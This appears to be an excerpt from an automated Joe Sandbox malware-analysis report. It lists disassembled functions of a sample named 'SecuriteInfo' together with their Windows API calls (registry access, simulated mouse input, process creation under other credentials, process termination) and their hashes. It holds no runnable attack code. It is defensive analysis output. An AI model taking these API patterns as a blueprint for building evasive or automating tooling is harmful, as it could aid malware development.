                    Function 007D046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D0624
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: da67ecec78b31a914d3fb2bcb69e6e5a3e5c94dd54d852491e3fc0f964f706b4
                    • Instruction ID: 1a805e111a9bf99d30e3797cb12f51f5f2ba27603b56899138ee7ec616dadaf3
                    • Opcode Fuzzy Hash: da67ecec78b31a914d3fb2bcb69e6e5a3e5c94dd54d852491e3fc0f964f706b4
                    • Instruction Fuzzy Hash: FE514D31508240DFC714EF24D889E6ABBF8FF85314F04891EF946972A1DB79E915CB92
                    Function 007D5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 007D5A82
                    • GetMenuItemCount.USER32(00000000), ref: 007D5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D5AE1
                    • GetMenuItemID.USER32(?,?), ref: 007D5B50
                    • GetSubMenu.USER32(?,?), ref: 007D5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D5BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: a492d8597bd8e355a9e252f1b26a8bfbcb84c168ba363e6667c24d69c4adc981
                    • Instruction ID: 5488ba54c48ddb8239a91e8a415689d621a3f53410f29ce094f349524c0f0b42
                    • Opcode Fuzzy Hash: a492d8597bd8e355a9e252f1b26a8bfbcb84c168ba363e6667c24d69c4adc981
                    • Instruction Fuzzy Hash: 30517F75A00615EFCF11DF64C845AEEBBB4EF48310F14846AE956B7351CB78AE41CB90
                    Function 007AF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007AF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 007AF469
                    • VariantClear.OLEAUT32(00000000), ref: 007AF4C4
                    • _memmove.LIBCMT ref: 007AF4EE
                    • VariantClear.OLEAUT32(?), ref: 007AF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007AF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 42191b8e5d10618f6b131f08b393182c79b0734e99406a42cc157ed160478538
                    • Instruction ID: 3ca79c27bb5ded022b6ae050a4bdddd41ae45192a54bba18ade0e70bb877b41c
                    • Opcode Fuzzy Hash: 42191b8e5d10618f6b131f08b393182c79b0734e99406a42cc157ed160478538
                    • Instruction Fuzzy Hash: B4516D75A00249DFCB14CF58D884AAAB7B8FF8D354B158669ED59DB300D734E911CFA0
                    Function 007B26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007B2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2792
                    • IsMenu.USER32(00000000), ref: 007B27B2
                    • CreatePopupMenu.USER32 ref: 007B27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 007B2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                    • Instruction ID: 87fac09c8b8d9708c6235a664f165409314cf33e4b39bc094aed460099eb9fca
                    • Opcode Fuzzy Hash: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                    • Instruction Fuzzy Hash: 7F51C170A02309DFDF25CF68D888BEEBBF5AF44314F104229E4159B292D7789906CB61
                    Function 00751765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0075179A
                    • GetWindowRect.USER32(?,?), ref: 007517FE
                    • ScreenToClient.USER32(?,?), ref: 0075181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0075182C
                    • EndPaint.USER32(?,?), ref: 00751876
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 8231f531cce8a1fef7ed8f38090de58ae68a32bdd799ca2392fcd2258a15ebd9
                    • Instruction ID: d45a192b2fff4b24e434c4763c1621ee4a72ba1bd3da33d6ffe3b8e8196de3f1
                    • Opcode Fuzzy Hash: 8231f531cce8a1fef7ed8f38090de58ae68a32bdd799ca2392fcd2258a15ebd9
                    • Instruction Fuzzy Hash: 85419F70100201AFD710DF25CC84BB67BF8FB49736F048669F9A5862A1D779A849DB62
                    Function 007DB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(008167B0,00000000,011E53C0,?,?,008167B0,?,007DB862,?,?), ref: 007DB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 007DB9F0
                    • ShowWindow.USER32(008167B0,00000000,011E53C0,?,?,008167B0,?,007DB862,?,?), ref: 007DBA50
                    • ShowWindow.USER32(00000000,00000004,?,007DB862,?,?), ref: 007DBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 007DBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DBAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                    • Instruction ID: 7cb32572f1e0bb9d048d8a7308f729274b2336ba64799535b441b8bf92452976
                    • Opcode Fuzzy Hash: 00aeab717322b7b70e58ab44f152c4a60398f34bdba8731a301037ff5ba4d0d4
                    • Instruction Fuzzy Hash: 16414F34601241EFDB21CF24C499B957BF0FB49310F1A82BBEA499F7A2C739A845CB51
                    Function 007C73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,007C5134,?,?,00000000,00000001), ref: 007C73BF
                      • Part of subcall function 007C3C94: GetWindowRect.USER32(?,?), ref: 007C3CA7
                    • GetDesktopWindow.USER32 ref: 007C73E9
                    • GetWindowRect.USER32(00000000), ref: 007C73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007C7422
                      • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                    • GetCursorPos.USER32(?), ref: 007C744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007C74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 4399ec63805a0b902c0ab2639b1c04b286a6b18314aa2cae3aaa2181d3f7fa76
                    • Instruction ID: 7ed29c7025c61f9c2cee4f5f72d822511dcbc336863d82fbd2d22b4656297fc5
                    • Opcode Fuzzy Hash: 4399ec63805a0b902c0ab2639b1c04b286a6b18314aa2cae3aaa2181d3f7fa76
                    • Instruction Fuzzy Hash: 22310432509345ABC728DF14D849F9BBBE9FF88314F00491EF48997191CB38EA08CB92
                    Function 007A8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                      • Part of subcall function 007A85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                      • Part of subcall function 007A85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                      • Part of subcall function 007A85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                      • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                    • GetLengthSid.ADVAPI32(?,00000000,007A8977), ref: 007A8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007A8DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 007A8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 007A8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,007A8977), ref: 007A8DEC
                    • HeapFree.KERNEL32(00000000), ref: 007A8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 19105afd2250670dfdc13655f3fcee47a609426306ab0a0cf5ed4c7e968147cc
                    • Instruction ID: a5eec58c9952b7f214b30e01d813bd7496c16aae889d268c83d3e03c5e8bab78
                    • Opcode Fuzzy Hash: 19105afd2250670dfdc13655f3fcee47a609426306ab0a0cf5ed4c7e968147cc
                    • Instruction Fuzzy Hash: 78110332601605FFDB549F64CC08BAE7B79FF8A315F10822AF88697250CB3A9D00CB61
                    Function 007A8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007A8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 007A8B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007A8B40
                    • CloseHandle.KERNEL32(00000004), ref: 007A8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007A8B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 007A8B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                    • Instruction ID: 9966d33e0ae0d01789eee5e0c13f3c993a338beddecc534543b556ce826a5fcb
                    • Opcode Fuzzy Hash: e235678695c3f86b0fa186ed8fc8aa9fea3b55e2d9478a52d54d13419f7e9e3b
                    • Instruction Fuzzy Hash: D41129B2501209ABDF018FA8ED49FDE7BB9FF49314F048165FE05A2160C77A9D60AB61
                    Function 007DC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                      • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007DC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 007DC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 007DC1F6
                    • EndPath.GDI32(00000000), ref: 007DC206
                    • StrokePath.GDI32(00000000), ref: 007DC216
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: c9b6239b6eefc246cab1a9a293fe6b84abcd7c86e41d26f95ca7863b41952d1f
                    • Instruction ID: a604100b110a54bec08643f68b9beae481037c1d470e81ee1ab04db64708d53d
                    • Opcode Fuzzy Hash: c9b6239b6eefc246cab1a9a293fe6b84abcd7c86e41d26f95ca7863b41952d1f
                    • Instruction Fuzzy Hash: A811F77640010DBFDB129F90DC88EEA7FADFF08354F048022FA195A161D7769E55DBA0
                    Function 007703A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                    • Instruction ID: 639564cf0432b3fd9fe4738413ae39a99cb4a4aa752333ca53fb88f985ce0813
                    • Opcode Fuzzy Hash: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                    • Instruction Fuzzy Hash: 8B0148B0902759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5
                    Function 007B568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 007B56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                    • Instruction ID: ea053f3a7939fe805057978136113968c99ab897f24ddb7388bc1c8da4aba3e0
                    • Opcode Fuzzy Hash: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                    • Instruction Fuzzy Hash: 1CF03032242158BBE7215BA2DC0DEEF7F7CEFC6B11F04416AFA06D1050D7A95A0186B9
                    Function 007B74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 007B74E5
                    • EnterCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00761044,?,?), ref: 007B7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00761044,?,?), ref: 007B7510
                      • Part of subcall function 007B6ED7: CloseHandle.KERNEL32(00000000,?,007B751D,?,00761044,?,?), ref: 007B6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7523
                    • LeaveCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                    • Instruction ID: 0ede34388908686080131d3596c08141ac48ff0a084fae39e02ec4b085f35ca2
                    • Opcode Fuzzy Hash: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                    • Instruction Fuzzy Hash: 44F03A3A142612EBDB112B64EC8CAEE773ABF45302B014532F243A10A0CB796911CB64
                    Function 007A8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007A8E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 007A8E8B
                    • CloseHandle.KERNEL32(?), ref: 007A8E94
                    • CloseHandle.KERNEL32(?), ref: 007A8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007A8EA5
                    • HeapFree.KERNEL32(00000000), ref: 007A8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                    • Instruction ID: c9e9d49794aab6145ce7aa3a184005001cf46356b467754013e4e72bc4e0eef9
                    • Opcode Fuzzy Hash: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                    • Instruction Fuzzy Hash: 9EE0C236105005FBDA012FE5EC0C94ABF79FB89322B50C232F21A81170CB3A9820DB58
                    Function 007A7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,007DFB80,000000FF,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C6F
                    • _memcmp.LIBCMT ref: 007A7C90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
